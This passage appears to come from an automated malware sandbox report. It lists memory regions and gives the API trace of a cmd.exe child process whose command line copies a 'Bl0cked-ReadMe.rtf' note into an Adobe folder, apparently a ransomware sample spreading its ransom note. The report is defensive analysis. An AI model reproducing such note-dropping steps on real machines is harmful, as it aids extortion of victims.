0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17607 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 17608 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 17609 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17610 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17611 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17612 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17613 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17614 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17615 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17616 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17617 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17618 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17619 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17620 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 17621 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17622 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 258 os_tid = 0x988 Process: id = "202" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0xb2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17705 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17706 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17707 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17708 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 17709 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17710 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17711 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17712 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17713 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 17714 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17773 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17774 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17775 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17776 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 17777 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 17778 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17779 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17780 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17781 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17782 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17783 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17784 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17785 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17786 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17787 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 17788 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17789 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17790 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17791 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 17792 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 17793 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 17794 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 17795 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 17796 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 262 os_tid = 0x968 [0146.103] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcbc | out: lpSystemTimeAsFileTime=0x1cfcbc*(dwLowDateTime=0x91036320, dwHighDateTime=0x1d440a9)) [0146.103] GetCurrentProcessId () returned 0xb2c [0146.103] GetCurrentThreadId () returned 0x968 [0146.103] GetTickCount () returned 0x2d7a8 [0146.103] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfcb4 | out: lpPerformanceCount=0x1cfcb4*=20289218786) returned 1 [0146.103] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.104] __set_app_type (_Type=0x1) [0146.104] __p__fmode () returned 0x76b331f4 [0146.104] __p__commode () returned 0x76b331fc [0146.104] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0146.104] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0146.104] GetCurrentThreadId () returned 0x968 [0146.104] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x968) returned 0x38 [0146.104] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.104] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.104] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.104] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.104] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc4c | out: phkResult=0x1cfc4c*=0x0) returned 0x2 [0146.104] VirtualQuery (in: lpAddress=0x1cfc83, lpBuffer=0x1cfc1c, dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.104] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc1c, dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.104] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc1c, dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.104] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc1c, dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.104] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc1c, dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0146.104] GetConsoleOutputCP () returned 0x1b5 [0146.105] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.105] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.105] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.105] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.105] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.105] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.105] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.105] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.105] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.106] GetEnvironmentStringsW () returned 0x3b01c8* [0146.106] FreeEnvironmentStringsW (penv=0x3b01c8) returned 1 [0146.106] GetEnvironmentStringsW () returned 0x3b01c8* [0146.106] FreeEnvironmentStringsW (penv=0x3b01c8) returned 1 [0146.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebbc | out: phkResult=0x1cebbc*=0x40) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x0, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x1, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x1, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x0, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x40, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x40, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x40, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegCloseKey (hKey=0x40) returned 0x0 [0146.106] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebbc | out: phkResult=0x1cebbc*=0x40) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x40, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x1, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x1, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x0, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x9, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x9, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.107] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x9, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.107] RegCloseKey (hKey=0x40) returned 0x0 [0146.107] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886374 [0146.107] srand (_Seed=0x5b886374) [0146.107] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"" [0146.107] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"" [0146.107] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.107] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b1928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.107] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.107] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.107] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.107] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.107] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.107] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.107] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.107] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.107] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.107] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.107] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.107] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.108] GetEnvironmentStringsW () returned 0x3b2318* [0146.108] FreeEnvironmentStringsW (penv=0x3b2318) returned 1 [0146.108] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.108] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.108] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.108] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.108] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.108] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.108] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.108] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.108] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.108] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.108] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf988 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.108] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf988, lpFilePart=0x1cf984 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf984*="Desktop") returned 0x18 [0146.108] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.108] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf704 | out: lpFindFileData=0x1cf704) returned 0x3b0058 [0146.108] FindClose (in: hFindFile=0x3b0058 | out: hFindFile=0x3b0058) returned 1 [0146.108] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf704 | out: lpFindFileData=0x1cf704) returned 0x3b0058 [0146.109] FindClose (in: hFindFile=0x3b0058 | out: hFindFile=0x3b0058) returned 1 [0146.109] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf704 | out: lpFindFileData=0x1cf704) returned 0x3b0058 [0146.109] FindClose (in: hFindFile=0x3b0058 | out: hFindFile=0x3b0058) returned 1 [0146.109] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.109] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.109] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0146.109] GetEnvironmentStringsW () returned 0x3b2b38* [0146.109] FreeEnvironmentStringsW (penv=0x3b2b38) returned 1 [0146.109] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.109] GetConsoleOutputCP () returned 0x1b5 [0146.110] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.110] GetUserDefaultLCID () returned 0x409 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfac8, cchData=128 | out: lpLCData="0") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfac8, cchData=128 | out: lpLCData="0") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfac8, cchData=128 | out: lpLCData="1") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0146.110] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.111] GetConsoleTitleW (in: lpConsoleTitle=0x3a0910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.111] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.111] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.111] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.112] _wcsicmp (_String1="type", _String2=")") returned 75 [0146.112] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0146.112] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0146.112] _wcsicmp (_String1="IF", _String2="type") returned -11 [0146.112] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0146.112] _wcsicmp (_String1="REM", _String2="type") returned -2 [0146.112] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0146.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.116] GetFileType (hFile=0x7) returned 0x2 [0146.116] 